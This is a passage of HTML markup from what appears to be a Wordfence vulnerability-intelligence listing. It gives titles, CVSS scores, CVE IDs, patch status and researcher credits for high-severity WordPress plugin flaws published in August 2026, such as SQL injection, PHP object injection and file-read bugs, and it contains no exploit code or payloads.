					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78292" target="_blank" rel="noopener noreferrer">							CVE-2026-78292						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form" target="_blank" rel="noopener">Hash Form – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[hash-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45ae3007a457a80b6d668a0c9853b980.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ae3007a457a80b6d668a0c9853b980"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener">Supakiad S.</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e6984f14-3b89-47f0-8137-26e447cb09f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22d9e438-4b59-4622-9b2e-096c7bde4a00" target="_blank" rel="noopener">Tickera – Sell Tickets &amp; Manage Events &lt;= 3.6.0.2 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82226" target="_blank" rel="noopener noreferrer">							CVE-2026-82226						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">Tickera – Sell Tickets &amp; Manage Events</a> <span class="wfvr-software-slug">[tickera-event-ticketing-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ionut-pipirig" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d21fb166407d8c0d8ecc877d8a409499.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d21fb166407d8c0d8ecc877d8a409499"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ionut-pipirig" target="_blank" rel="noopener">Ionut Pipirig</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22d9e438-4b59-4622-9b2e-096c7bde4a00" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e4533e0c-1684-4ca4-ac22-850e07620102" target="_blank" rel="noopener">Workeera – AI Job Board with Applicant Tracking System (ATS) &lt; 1.0.6 &#8211; Authenticated (Subscriber+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77016" target="_blank" rel="noopener noreferrer">							CVE-2026-77016						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/workeera-remote-tech-job-board" target="_blank" rel="noopener">Workeera – AI Job Board with Applicant Tracking System (ATS)</a> <span class="wfvr-software-slug">[workeera-remote-tech-job-board]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd20b99aec2d2287d2a86d71af4da7e5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd20b99aec2d2287d2a86d71af4da7e5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener">Shhriyash</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e4533e0c-1684-4ca4-ac22-850e07620102" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01a42d69-8230-4820-8f67-5e29a43f88db" target="_blank" rel="noopener">Beautiful taxonomy filters &lt;= 2.4.6 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78288" target="_blank" rel="noopener noreferrer">							CVE-2026-78288						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/beautiful-taxonomy-filters" target="_blank" rel="noopener">Beautiful taxonomy filters</a> <span class="wfvr-software-slug">[beautiful-taxonomy-filters]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01a42d69-8230-4820-8f67-5e29a43f88db" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b69b1343-9a0b-42d9-b8f6-1ba3e216e2bf" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment &lt;= 2.7.5 &#8211; Authenticated (Contributor+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78257" target="_blank" rel="noopener noreferrer">							CVE-2026-78257						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-and-rental-manager-for-woocommerce" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment</a> <span class="wfvr-software-slug">[booking-and-rental-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b69b1343-9a0b-42d9-b8f6-1ba3e216e2bf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b8181e-a268-4952-a113-d8daab52500c" target="_blank" rel="noopener">Document Embedder – let visitors read files without downloading &lt; 2.3.1 &#8211; Unauthenticated Arbitrary Document Download</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16567" target="_blank" rel="noopener noreferrer">							CVE-2026-16567						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/document-emberdder" target="_blank" rel="noopener">Document Embedder – let visitors read files without downloading</a> <span class="wfvr-software-slug">[document-emberdder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b8181e-a268-4952-a113-d8daab52500c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49e6bfc0-8b71-467e-bb2b-b28041a01a11" target="_blank" rel="noopener">ePayco plugin for WooCommerce &lt;= 8.4.6 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78260" target="_blank" rel="noopener noreferrer">							CVE-2026-78260						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/epayco-gateway" target="_blank" rel="noopener">ePayco plugin for WooCommerce</a> <span class="wfvr-software-slug">[epayco-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lee-chul-woong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/72d885691c67a8179868e1305c6b6109.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72d885691c67a8179868e1305c6b6109"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lee-chul-woong" target="_blank" rel="noopener">Lee chul woong</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49e6bfc0-8b71-467e-bb2b-b28041a01a11" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b24bd192-c45b-479c-9e5a-7b83799f8f99" target="_blank" rel="noopener">Formidable Charts &lt;= 2.0.1 &#8211; Unauthenticated Arbitrary File Read via &#8216;frm_graph&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15990" target="_blank" rel="noopener noreferrer">							CVE-2026-15990						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable-charts" target="_blank" rel="noopener">Formidable Charts</a> <span class="wfvr-software-slug">[formidable-charts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b24bd192-c45b-479c-9e5a-7b83799f8f99" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f413b610-839a-4a93-aec5-b6566371ccb7" target="_blank" rel="noopener">One User Avatar | User Profile Picture &lt;= 2.5.4 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via wpua-file Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18983" target="_blank" rel="noopener noreferrer">							CVE-2026-18983						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/one-user-avatar" target="_blank" rel="noopener">One User Avatar | User Profile Picture</a> <span class="wfvr-software-slug">[one-user-avatar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29bd5dd110d9d483d533b011e29522de.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29bd5dd110d9d483d533b011e29522de"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener">Dthangws</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f413b610-839a-4a93-aec5-b6566371ccb7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9baea072-2c07-40b6-8410-2ebe752b0874" target="_blank" rel="noopener">SAML Single Sign On &lt;= 5.4.6 &#8211; Unauthenticated Authentication Bypass via X.509 Certificate Poisoning</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75807" target="_blank" rel="noopener noreferrer">							CVE-2026-75807						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">SAML Single Sign On – SSO Login</a> <span class="wfvr-software-slug">[miniorange-saml-20-single-sign-on]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tanishq-shah" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/401bad744b8274f340c78fd03086a60a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="401bad744b8274f340c78fd03086a60a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tanishq-shah" target="_blank" rel="noopener">Tanishq Shah</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thatchapol-booranatanit-alicezz" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3b9ba262ab672a53e1707857cc391135.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3b9ba262ab672a53e1707857cc391135"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thatchapol-booranatanit-alicezz" target="_blank" rel="noopener">Thatchapol Booranatanit (AliceZz)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9baea072-2c07-40b6-8410-2ebe752b0874" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/168f993a-21ce-4548-9c37-7e80d5c4e00e" target="_blank" rel="noopener">Smart Marketing SMS and Newsletters Forms &lt;= 5.1.24 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81756" target="_blank" rel="noopener noreferrer">							CVE-2026-81756						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-marketing-for-wp" target="_blank" rel="noopener">Smart Marketing SMS and Newsletters Forms</a> <span class="wfvr-software-slug">[smart-marketing-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45ae3007a457a80b6d668a0c9853b980.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ae3007a457a80b6d668a0c9853b980"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener">Supakiad S.</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/168f993a-21ce-4548-9c37-7e80d5c4e00e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e6acce-ba76-488d-8dde-5b5895c30872" target="_blank" rel="noopener">Smush – Image Optimization, Compression, Lazy Load, WebP &amp; CDN &lt;= 4.2.0 &#8211; Unauthenticated Denial of Service</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81285" target="_blank" rel="noopener noreferrer">							CVE-2026-81285						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-smushit" target="_blank" rel="noopener">Smush – Image Optimization, Compression, Lazy Load, WebP &amp; CDN</a> <span class="wfvr-software-slug">[wp-smushit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e6acce-ba76-488d-8dde-5b5895c30872" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d817d6b8-dad5-4469-9332-fbee8d75bb0b" target="_blank" rel="noopener">Throws SPAM Away &lt;= 3.8.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81763" target="_blank" rel="noopener noreferrer">							CVE-2026-81763						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/throws-spam-away" target="_blank" rel="noopener">Throws SPAM Away</a> <span class="wfvr-software-slug">[throws-spam-away]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiemook" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6c02c2a9a8f148c260a3f7b0e64cd4fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6c02c2a9a8f148c260a3f7b0e64cd4fd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiemook" target="_blank" rel="noopener">Jiemook</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d817d6b8-dad5-4469-9332-fbee8d75bb0b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1fed22d4-8526-429c-950b-c5affe108a93" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution &lt; 4.0.6 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19094" target="_blank" rel="noopener noreferrer">							CVE-2026-19094						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
